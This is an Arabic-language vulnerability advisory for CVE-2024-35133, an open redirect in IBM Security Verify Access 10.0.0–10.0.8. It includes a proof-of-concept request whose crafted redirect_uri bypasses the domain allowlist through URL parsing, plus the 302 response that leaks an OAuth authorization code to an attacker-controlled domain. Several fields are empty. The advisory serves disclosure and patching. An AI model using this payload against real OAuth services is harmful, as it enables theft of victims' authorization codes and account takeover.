
نشرة أمنية لـ CVE-2024-35133 - مع PoC
المراجعة: 1.0
التأثير:
من خلال إقناع الضحية بزيارة موقع ويب مصمم خصيصًا، يمكن لمهاجم عن بُعد استغلال هذه الثغرة لتزوير عنوان URL المعروض وإعادة توجيه المستخدم إلى موقع ضار. قد يسمح هذا للمهاجم بالحصول على معلومات شديدة الحساسية أو شن هجمات إضافية ضد الضحية.
الخطورة:
درجة CVSS:
CVE-ID: CVE-2024-35133
البائع: IBM
المنتجات المتأثرة:
الإصدارات المتأثرة: 10.0.0 - 10.0.8
IBM Security Verify Access هو حل متكامل لإدارة سياسات الأمان والتخويل للشبكات. يوفر حماية شاملة للموارد عبر شبكات الإنترانت والإكسترانت الموزعة جغرافيًا.
تشمل بعض الميزات الرئيسية:
أثناء اختبار اختراق لتدفق OAuth لدى عميل، تم اكتشاف ثغرة إعادة توجيه مفتوحة، مما يسمح بتسريب متغير "code" الخاص بـ OAuth.
من خلال تجاوز منطق المحلل المسؤول عن التحقق من معامل "redirect_uri" أثناء تدفق OAuth (باستغلال RFC 3986)، يمكن للمهاجم التلاعب بمرشح قائمة النطاقات المسموح بها في IBM Security Verify Access. أدى هذا إلى إعادة توجيه مفتوحة إلى أي نطاق عشوائي يتحكم فيه المهاجم. يمكن إعادة توجيه الضحية إلى موقع ضار بينما يبدو النطاق موثوقًا.
قد يؤدي هذا إلى كشف معلومات حساسة مثل رمز "code" الخاص بـ OAuth أو هجمات إضافية ضد الضحية.
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
راجع نشرة IBM الأمنية 7166712 للحصول على معلومات التصحيح أو الترقية أو الإجراء البديل المقترح.
انظر المراجع لمزيد من التفاصيل.
تم اكتشاف هذه الثغرة والإبلاغ عنها بواسطة:
حقوق النشر (ج) 2024 Giulio Garzia "Ozozuz"
يُسمح بإعادة التوزيع الإلكتروني لهذا التنبيه. لا يجوز تحريره دون موافقة خطية صريحة. للحصول على إذن لإعادة طبع هذا التنبيه في وسائط أخرى، يرجى الاتصال بالمؤلف.
إخلاء المسؤولية: المعلومات الواردة في هذا الإشعار دقيقة في وقت النشر بناءً على البيانات المتاحة. لا يتم تقديم أي ضمانات. لا يتحمل المؤلف أو الناشر أي مسؤولية عن الأضرار المباشرة أو غير المباشرة أو التبعية الناشئة عن استخدام هذه المعلومات.